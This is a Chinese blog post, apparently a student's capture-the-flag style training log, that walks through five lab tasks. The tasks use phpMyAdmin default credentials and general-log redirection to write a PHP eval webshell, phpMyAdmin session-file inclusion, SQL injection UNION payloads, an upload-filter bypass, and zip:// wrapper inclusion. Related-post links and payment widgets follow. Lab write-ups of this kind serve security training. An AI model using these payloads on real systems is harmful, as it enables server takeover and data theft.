Day-1 漏洞攻击实战

已于 2025-04-21 20:20:59 修改
阅读量1.7k 收藏 20
点赞数 29
文章标签: 安全 网络安全
于 2025-04-21 20:19:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75999912/article/details/147397931
版权

实训任务1 漏洞攻击实战一

使用 御剑 得到网站后台地址

        

数据库登录与日志配置​

  • 使用默认密码 root:root 登录phpMyAdmin,执行 SHOW VARIABLES LIKE 'general%' 查看日志状态。

  • 开启日志功能:set global general_log = "ON";(配图:SQL执行成功提示)。

​日志写入Webshell​

  • 修改日志路径到Web目录:

    set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

  • 执行 SELECT '<?php @eval($_POST[1]);?>' 写入木马。

​连接Webshell​

  • 访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

        

实训任务2 漏洞攻击实战二

        御剑扫描网站后台

        

        发现存在www.zip文件(管理员备份文件)

存在数据库后台登录账号密码

运行SELECT “ <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>”
生成shell.php文件(未生成)

构造url运行存在session的sql命令生成shell文件

http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_此处为步骤7获取到的sessionID

​连接Webshell​

访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

实训任务3 白云新闻搜索

  1. ​绕过过滤与注入验证​

    • 发现输入被转义,使用'触发报错。

  • 设置浏览器禁止使用JavaScript
    • 构造永真条件:' OR 1=1 -- ',确认存在注入。

  1. ​Union查询提取数据​

    • 确定列数后,联合查询表名: 
      ' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables -- '

' union select 1,COLUMN_NAME,3 from INFORMATION_SCHEMA.columns -- '

' union select 1,2,flag from admin -- '

        得到flag{fabbf4abe040f2fdac8234099facdccb}

实训任务4 手速要快

  1. ​绕过前端验证​

    • 修改文件后缀为.php.jpg      <?php @eval($_POST[123]);?>。 

  2. ​访问Webshell​

                       

实训任务5 包罗万象

        将php文件压缩上传

        

​上传ZIP并触发解压​

                上传包含shell.php的ZIP文件,利用伪协议包含:

http://192.168.210.84/index.php?url=zip:///var/www/html/upload/eee6b96824b2ab9ab6db41e36355eb89.zip%231

                %23 转译为#    ‘1’ 应该与压缩包内的php文件同名

​获取服务器权限​

  • 通过中国蚁剑管理服务器文件系统。

半升酒
关注
实训周---Day1 漏洞攻击实战
achiyyds的博客
04-21 927
记录实训周的日常。
[红日安全]Web安全Day10 - 重放攻击实战攻防
hongrisec的博客
03-05 636
本文由红日安全成员: misakikata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
等保二级和等保三级有啥区别?零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 877
等保二级的信息系统被定义为一般重要的信息系统,其受保护的对象通常是一些普通的商业信息或社会服务系统。根据国家标准 GB/T 22240-2020《信息安全技术 网络安全等级保护基本要求》,等保二级系统的损害可能会对社会秩序、公共利益或公民合法权益产生较小影响。举例来说:某中小型企业的财务管理系统。普通学校的教务管理系统。某些地方政府的小型网站。等保三级的信息系统被定义为重要的信息系统,其受保护的对象一般是涉及国家安全、经济命脉、重要公共利益或社会秩序的重要信息和服务。
实训Day-1 漏洞攻击实战
likfishdn的博客
04-21 757
1.在拿到靶机时首先可以进行目录扫描,查看是否存在可以目录2.在存在过滤时可以尝试双写等方式绕过3.存在前端JS过滤时可以直接禁用4.
实训Day1-漏洞攻击实战
qq_75009257的博客
04-21 853
第一天实训课直接下发了五个任务,感觉收获颇丰。
漏洞攻击实战 实训day1
2302_78574538的博客
04-23 578
通过 php 探针的信息,判断出该站点使用phpstudy 搭建,因为使用 phpstudy 搭建的站点默认存在该探针文件。4.根据上传zip返回绝对路径和文件包含这2点,我们可以通过上 传一个有php脚本的zip文件并且包含他来获取信息. 我们将一个文件内容为 的php文件打包成 一个zip压缩包。查看具体原因发现是因为程序自身会在 后面加上.php,注意,在包含文件的时候%23表示#,如果 直接使用#,浏览器会不编码,且把#以后的字符当做锚点, 请求的时候不会带上#以后的字符。
什么是0day漏洞1day漏洞和nday漏洞
ewii12567的博客
03-03 1417
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。,通常就是指还,也就是已经。这种漏洞危害巨大,因此也深得黑客的喜爱。通常0-day漏洞被公开后,都会引起广泛关注,相关厂商也需要紧急评估并尽快推出补丁,因为利用0-day漏洞进行的会很快随之而来。今年5月,微软紧急公开了已经被用于野外攻击的 Microsoft Windows 支持诊断工具 (MSDT)
信息安全实训日志——Day1漏洞攻击实战
2201_75338176的博客
04-21 815
但在实训中也遇到一些问题,如部分漏洞需要反复调试,后续应加强对细节的把握和对不同环境下漏洞利用的学习。文件上传:用户上传可执行脚本文件获取服务器命令执行权,需满足文件可执行、可访问且未被安全处理等条件,可通过结合多种文件类型判断方式等措施防范。文件包含:程序开发中引入文件的技术,若对引入文件变量校验不足会引发安全漏洞,可通过过滤用户输入等方式防范。版本的文件包含漏洞,可利用路径穿越符绕过目录限制,实现敏感文件读取或恶意代码执行。文件上传:结合文件上传和文件包含漏洞,利用。寻找网站在浏览器上的绝对地址。
Day-3 应急响应实战
最新发布
2201_75999912的博客
04-24 624
​​漏洞利用路径​​​​日志溯源方法​​​​数据库攻击路径​​​​日志关联分析​​​​Linux系统​​​​Windows系统​​​​Linux排查项​​​​Windows排查项​​​​Linux​​​​Windows​​
信息安全专业实训Day-1漏洞攻击实战
2405_86096835的博客
04-21 804
在数字化浪潮席卷全球的今天,信息安全的重要性日益凸显。在信息安全专业实训的第一天,我们通过漏洞攻击的学习,掌握了多方面的知识和技能,这些内容不仅让我们理解了漏洞如何被利用,以及攻击对系统、数据安全的潜在威胁。并且掌握了如何发现和修复漏洞,从而提升系统的整体安全性。下面我将详细介绍Day-1的实训内容。
脱敏版-神秘黑客组织:揭秘美国0Day攻击平台与APT实战案例.pdf
11-06
它依赖于NSA在全球互联网骨干网上部署的“量子”服务器,当目标尝试访问某个网站时,量子服务器能够抢先一步响应,强制浏览器访问预设的“酸狐狸”0day漏洞攻击平台。这种方法有效地绕过了许多传统安全防护措施,...
[红日安全]Web安全Day9 - 文件下载漏洞实战攻防
hongrisec的博客
03-04 444
本文由红日安全成员: Once 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Python靶...
【Acunetix-WVS漏洞分析实战】:API安全扫描与防护的要点剖析
本文介绍了API安全的基础知识,深入探讨了API漏洞的类型及其成因,并通过案例研究提供了实际漏洞分析。在实践方面,本文详细阐述了使用Acunetix-WVS进行API漏洞扫描的步骤,包括工具的安装、配置、执行扫
安恒安全渗透面试题
persist213的博客
04-21 850
安全渗透面试:漏洞扫描与渗透测试(自动化工具 vs 人工模拟攻击
精准管控,安全护航 -Acrel-2000 电力监控系统助力配电房数字化升级
Acrel13611965514的博客
04-22 981
同时,系统所采用的智能电力仪表、微机保护装置、串口服务器等常见硬件设备,以及新一代智能保护测控装置、分布式智能故障指示器等新产品,相互协作,共同为变电所的智能化运行提供了坚实的技术支撑。此外,系统还会详细记录报警事件,包括事件发生的时间、类型、相关参数等,为后续的故障分析和处理提供详尽的数据支持。Acrel-2000 系统能够通过智能电力仪表等设备,实时采集变电所内配电现场的各种电参量,如三相电压、三相电流、有功功率、无功功率、功率因数、频率等,以及开关信号,包括断路器、隔离开关的分合闸状态等。
SMB协议
m0_68037567的博客
04-22 559
SMB是用于局域网内资源共享的协议,支持文件传输、打印机访问和进程间通信,常见于Windows系统(如Windows共享文件夹)。使用Wireshark抓包,分析SMB流量中的异常请求(如畸形数据包、高频连接)。:攻击者截获SMB认证流量(NTLM哈希),并中继到其他服务器,冒充合法用户。部署IPS/IDS,配置规则检测SMB攻击流量(如Suricata规则)。:攻击者利用未修复的SMB漏洞(如CVE-2017-0144)。:攻击者通过SMB在内网传播恶意软件(如勒索软件、蠕虫)。
LibrePhotos本地部署打造个人云相册安全存储和分享家庭照片(1)
YYDsis的博客
04-24 1117
手机里塞满了珍贵回忆,却担心一不小心就被偷看?别怕,今天我就教你一个绝招——使用自建私有云相册。这不仅比Google Photos更安全可控,还无需公网IP或域名,因为咱们有cpolar这个神器来帮忙打通内网壁垒!跟着我一起,让你的照片管理从此变得既酷又安全吧!
嵌入式软件测试的革新:如何用深度集成工具破解效率与安全的双重困局?
fzm5298的博客
04-22 835
某工业机器人厂商将winAMS的CSV测试集与Simulink生成的预期输出对比,发现了PID控制算法中一个累积误差未被清零的缺陷,该问题在仿真环境中因浮点精度差异始终未被察觉。或许,这就是为什么一位资深工程师在技术论坛中这样评价:“用了winAMS后,我们终于不用在深夜手动补测试用例了——它像一位沉默的搭档,默默扛起了那些重复却至关重要的工作。某国内新能源车企的测试团队反馈,通过winAMS的路径分析功能,他们发现某电机控制函数在低温条件下的一个异常分支未被覆盖,成功避免了潜在的车载控制器死机风险。
Inxpect 新推高性价比版毫米波安全雷达:以经济实用护航工业安全
欣佰特cnbestec的博客
04-23 568
在工业安全与自动化领域,Inxpect 品牌凭借深厚技术积累和创新能力,逐渐占据重要地位。其毫米波安全雷达系统凭借出色性能和高可靠性,为工业环境中的人员与设备安全筑牢防线。Inxpect 品牌的成长历程见证了其在工业安全领域的持续深耕。从早期技术研发到如今全球市场拓展,Inxpect 始终专注创新。2020 年,Inxpect 抓住数字化转型机遇,成功适应工业 4.0 需求。通过优化产品性能和提升用户体验,品牌在工业安全领域赢得良好声誉。宝马集团慕尼黑工厂焊接线的应用,体现了其产品在工业自动化领域的实力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值